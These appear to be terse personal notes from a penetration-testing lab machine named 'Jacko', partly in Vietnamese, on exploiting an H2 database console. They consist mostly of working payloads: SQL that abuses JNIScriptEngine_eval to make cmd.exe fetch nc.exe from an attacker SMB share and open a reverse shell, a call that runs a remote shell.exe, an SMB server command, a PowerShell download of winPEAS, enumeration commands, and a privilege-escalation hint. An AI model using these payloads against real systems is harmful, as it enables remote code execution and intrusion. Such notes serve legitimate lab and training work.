jacko
#Jacko - h2 exploit - craft
2 cách
Cách 1
-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.49.67/Share/nc.exe -e cmd.exe 192.168.49.67 8082").getInputStream()).useDelimiter("\Z").next()');
python2 smbserver.py -smb2support Share /home/kali/
https://www.exploit-db.com/exploits/49384
-- Evaluate script CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval"; CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("cmd.exe /c //192.168.45.250/nc.exe -e cmd.exe 192.168.45.250 4444").getInputStream()).useDelimiter("\Z").next()');
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("//192.168.45.250/khoa/shell.exe").getInputStream()).useDelimiter("\\Z").next()');
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
Hint: list all local users (output format COMPUTERNAME\username)
Get-LocalUser | ForEach-Object { "$env:COMPUTERNAME\$($_.Name)" }
Get-CimInstance Win32_Process |
Select-Object Name, CommandLine |
Format-List
$WebClient = New-Object System.Net.WebClient; $WebClient.DownloadFile("http://192.168.49.103/winPEASx86.exe","C:\users\tony\winPEASx86.exe")
https://www.exploit-db.com/exploits/49382
Upload file ps1 và .dll lên desktop, sau đó thực thi file ps1 để lấy quyền